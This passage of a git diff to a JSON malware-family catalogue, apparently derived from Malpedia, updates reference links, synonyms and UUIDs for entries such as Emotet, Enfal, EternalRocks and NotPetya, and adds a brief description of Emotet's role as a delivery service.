"3477a25d-e04b-475e-8330-39f66c10cc01", @@ -7524,8 +14483,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer", "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", - "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", - "https://attack.mitre.org/software/S0064" + "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/", + "https://attack.mitre.org/software/S0064", + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" ], "synonyms": [ "Elmost" @@ -7543,6 +14503,8 @@ "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "https://www.macnica.net/file/security_report_20160613.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/" ], "synonyms": [], @@ -7553,42 +14515,180 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.emissary", + "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a171f40a-85eb-4b64-af1d-8860a49b3b40", + "value": "Emissary" + }, + { + "description": "While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.\r\nIt is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", - "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", - "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", - "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", - "https://github.com/d00rt/emotet_research", - "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.youtube.com/watch?v=q8of74upT_g", + "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/", + "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure", + "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet", + "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.jpcert.or.jp/english/at/2019/at190044.html", + "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/", + "https://twitter.com/raashidbhatt/status/1237853549200936960", "https://www.us-cert.gov/ncas/alerts/TA18-201A", - "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", + "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf", + "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure", + "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", - "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", - "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", - "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", - "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", - "https://persianov.net/emotet-malware-analysis-part-1", - "https://persianov.net/emotet-malware-analysis-part-2", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-crestwood", + "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://www.youtube.com/watch?v=5_-oR_135ss", + "https://www.digitalshadows.com/blog-and-research/emotet-disruption/", + "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/", + "https://www.youtube.com/watch?v=_BLOmClsSpc", "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", - "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", "https://paste.cryptolaemus.com", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", - "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://feodotracker.abuse.ch/?filter=version_e", + "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html", + "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code", + "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", - "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69" + "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/", + "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69", + "https://www.lac.co.jp/lacwatch/people/20201106_002321.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled", + "https://blog.talosintelligence.com/2020/11/emotet-2020.html", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://www.hornetsecurity.com/en/security-information/emotet-is-back/", + "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures", + "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728", + "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/", + "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b", + "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/", + "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/", + "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html", + "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/", + "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", + "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", + "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation", + "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", + "https://www.youtube.com/watch?v=8PHCZdpNKrw", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/", + "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", + "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", + "https://github.com/mauronz/binja-emotet", + "https://www.cert.pl/en/news/single/whats-up-emotet/", + "https://persianov.net/emotet-malware-analysis-part-1", + "https://persianov.net/emotet-malware-analysis-part-2", + "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", + "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", + "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/", + "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/", + "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", + "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack", + "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware", + "https://hatching.io/blog/powershell-analysis", + "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf", + "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/", + "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/", + "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", + "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html", + "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://www.youtube.com/watch?v=_mGMJFNJWSk", + "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/", + "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", + "http://ropgadget.com/posts/defensive_pcres.html", + "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", + "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html", + "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/", + "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break", + "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://intel471.com/blog/emotet-takedown-2021/", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/", + "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://feodotracker.abuse.ch/?filter=version_e", + "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", + "https://unit42.paloaltonetworks.com/domain-parking/", + "https://spamauditor.org/2020/10/the-many-faces-of-emotet/", + "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://securelist.com/the-chronicles-of-emotet/99660/", + "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/", + "https://twitter.com/milkr3am/status/1354459859912192002", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://github.com/d00rt/emotet_research", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", + "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates", + "https://isc.sans.edu/diary/rss/27036", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", + "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", + "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://d00rt.github.io/emotet_network_protocol/", + "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/", + "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/", + "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", + "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/", + "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html", + "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612", + "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf", + "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/", + "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", + "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de" ], "synonyms": [ "Geodo", @@ -7604,7 +14704,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", - "https://twitter.com/thor_scanner/status/992036762515050496" + "https://paper.seebug.org/1301/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://twitter.com/thor_scanner/status/992036762515050496", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://redcanary.com/blog/getsystem-offsec/", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas" ], "synonyms": [], "type": [] @@ -7612,14 +14725,30 @@ "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", "value": "Empire Downloader" }, + { + "description": "Supposedly a worm that was active around 2012-2013.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.emudbot", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_emudbot.jp" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d3189268-443b-42f6-99a2-12d29f309c0b", + "value": "Emudbot" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", - "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", - "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", - "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" + "https://www.secureworks.com/research/threat-profiles/bronze-palace", + "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/" ], "synonyms": [ "Lurid" @@ -7629,13 +14758,26 @@ "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", "value": "Enfal" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.enviserv", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Enviserv.A" + ], + "synonyms": [], + "type": [] + }, + "uuid": "58071588-708d-447d-9fb4-8c9268142c82", + "value": "Enviserv" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", - "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf", + "https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html" ], @@ -7684,7 +14826,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", - "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" + "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" ], "synonyms": [], "type": [] @@ -7692,6 +14834,47 @@ "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", "value": "Eredel" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.erica_ransomware", + "https://www.dropbox.com/s/f4uulu2rhyj4leb/Girl.scr_malware_report.pdf?dl=0" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0f4731b3-b661-4677-9e51-474504313202", + "value": "Erica Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eris", + "https://lekstu.ga/posts/go-under-the-hood-eris/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c4531af6-ab25-4266-af41-e01635a93abe", + "value": "Eris Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks", + "https://github.com/stamparm/EternalRocks" + ], + "synonyms": [ + "MicroBotMassiveNet" + ], + "type": [] + }, + "uuid": "10dd9c6a-9baa-40b6-984a-0598c4d9a88f", + "value": "EternalRocks" + }, { "description": "", "meta": { @@ -7701,27 +14884,38 @@ "https://securelist.com/from-blackenergy-to-expetr/78937/", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", - "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", "http://www.intezer.com/notpetya-returns-bad-rabbit/", + "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", + "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", + "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", - "https://www.riskiq.com/blog/labs/badrabbit/", - "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", - "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://gvnshtn.com/maersk-me-notpetya/", + "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", - "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://www.secureworks.com/research/threat-profiles/iron-viking", "https://securelist.com/schroedingers-petya/78870/", "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", - "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", @@ -7729,9 +14923,10 @@ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", - "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", + "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", - "https://securelist.com/bad-rabbit-ransomware/82851/" + "https://securelist.com/bad-rabbit-ransomware/82851/", + "https://www.riskiq.com/blog/labs/badrabbit/" ], "synonyms": [ "BadRabbit", @@ -7754,8 +14949,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", + "https://www.secureworks.com/research/threat-profiles/bronze-globe", "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" ], "synonyms": [ @@ -7771,7 +14966,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", - "https://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [], @@ -7785,7 +14981,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" ], "synonyms": [ "Vidgrab" @@ -7800,8 +14998,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", - 